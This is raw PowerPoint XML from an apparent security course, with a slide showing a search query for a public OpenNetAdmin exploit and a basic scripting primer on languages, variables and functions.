            <a:pPr marL="571500" marR="0" lvl="2"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200" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>opennetadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>site:github.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2200" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRP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endParaRP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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F648023D-554C-464F-ADC6-4480560E56CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5478458" y="3789680"/>
            <a:ext cx="6452360" cy="2285989"/>
            <a:chOff x="5326058" y="3037851"/>
            <a:chExt cx="6452360" cy="2285989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB40A47C-AC0B-4D74-9A38-D4352D139A43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect r="19540" b="74440"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5326815" y="3037851"/>
              <a:ext cx="6451603" cy="1300469"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A31C51E4-B35D-4626-BCA4-03DC8E9F28B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect t="79931" r="19540"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5326058" y="4302760"/>
              <a:ext cx="6451603" cy="1021080"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4ABFCD7-5CFA-4087-AD3D-2D6A5727397B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="850427" y="3789680"/>
            <a:ext cx="3183885" cy="2171700"/>
            <a:chOff x="4386107" y="2448560"/>
            <a:chExt cx="3183885" cy="2171700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12" descr="A person wearing headphones&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B56421-CC19-4517-AB66-4558186BA64D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect l="8323" r="16191"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4643120" y="2448560"/>
              <a:ext cx="2631440" cy="1960880"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D969D4-4BE3-49E8-AB4D-EAACD61FB376}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4386107" y="4097040"/>
              <a:ext cx="3183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12700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="E6E6E6"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>YEAH, BIG BRAIN TIME</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37367346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E995DB-4AE8-4F4E-90F5-DCA15F10F0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73D7DE3A-2366-4043-9C87-F27502C3B2D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting Primer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35858878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25265E-68E0-4634-952B-4CFE223F28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1F02683-4AFA-4403-B705-39DF51CA1FBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D39755E1-B753-4B50-BA1E-15E49606821C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="6545262" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is not a programming class!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Experiment, Google, and most importantly: 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Stack Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>We’ll cover the basics with small examples in: bash, PowerShell, Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interpreted vs Compiled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions/Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controlling execution flow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Logo, sunburst chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E3278FC-1BEE-4E9A-8BB0-27D03962F91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1009" y1="67406" x2="49444" y2="66970"/>
                        <a14:foregroundMark x1="49444" y1="66970" x2="54256" y2="67485"/>
                        <a14:foregroundMark x1="54256" y1="67485" x2="55602" y2="66812"/>
                        <a14:foregroundMark x1="42354" y1="53782" x2="53868" y2="59564"/>
                        <a14:foregroundMark x1="45356" y1="42218" x2="55317" y2="49030"/>
                        <a14:foregroundMark x1="51151" y1="32277" x2="58215" y2="42376"/>
                        <a14:foregroundMark x1="55524" y1="22376" x2="64476" y2="41267"/>
                        <a14:foregroundMark x1="64476" y1="41267" x2="64709" y2="41347"/>
                        <a14:foregroundMark x1="43467" y1="39564" x2="43467" y2="39564"/>
                        <a14:foregroundMark x1="52807" y1="21267" x2="52807" y2="21267"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="29102" t="17291" r="32114" b="14121"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8839200" y="2219960"/>
            <a:ext cx="2092960" cy="2418080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26741222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AEED94-1AAB-4D96-87E4-4B8F05C5A2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C48740C-20E8-405E-92C0-62DB825E00B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When Should I Script?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0013443-7B2B-4D67-BD7F-3055385EEEA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282258" y="2133600"/>
            <a:ext cx="4442141" cy="3093720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just starting out: A lot (if you have the time)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With experience: Only if it actually saves you time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute forcing, for example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Text, table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80FB7738-2E1E-4759-BE34-7C3F75B04547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569016" y="1002292"/>
            <a:ext cx="6209402" cy="5044798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2202388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7A607-EF5C-4057-9081-1313C00B6B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1D071C9-6902-4EA2-9442-37724F3607D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programming Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF66E47F-61B4-48EC-A4D7-4A3727917EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compiled and Interpreted Languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compiled: C, C++, many more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripted: Bash, PowerShell, Python, many, many more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compiled Features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code is converted into machine-specific instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically runs faster, but more goes into development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interpreted Features (Focus for Today)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Highly portable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good for prototyping and building tools for repetitive tasks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4233004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383C6-57B4-4EBA-AAAE-C4E3C2CFC4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7FD8530-83C0-4D10-A8E9-3815D00B3811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67089FEA-E1D9-4345-8533-7C7327B74928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="6900861" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strongly-Typed: declared at start, no changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loosely-Typed: No explicit declaration and/or can change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Declaring Variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	is generally for assignment, but can differ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	should be used for equality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some languages require a prefix, like $</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global vs. Local – More on this later</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F41D6173-86E2-410D-93CC-8B52A4370E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="2110428"/>
            <a:ext cx="4785775" cy="3208298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82270C18-BD4B-4834-B587-84E7AECC9F09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9845040" y="2293308"/>
            <a:ext cx="436880" cy="277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934054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36574A-7572-4A37-9A72-3C2724CD80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EF2D317-28CB-471F-BFDF-840EB487CAE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions (AKA Methods)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B018D5E6-4878-416E-AAE1-7F0E4722AD07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="6392861" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Repeatable code blocks assigned names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rule of thumb: they should do one thing for easier debugging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can accept </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>arguments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(AKA parameters)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variables passed into the function on which to operate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can stand alone or return information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“return” keyword is fairly ubiquitous, but not in bash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E5683F6-A2B4-4CE0-8343-0359A1D0D31D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7100411" y="2532304"/>
            <a:ext cx="4366638" cy="1752752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC37C550-38E0-4DA1-9C20-803E82D209A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
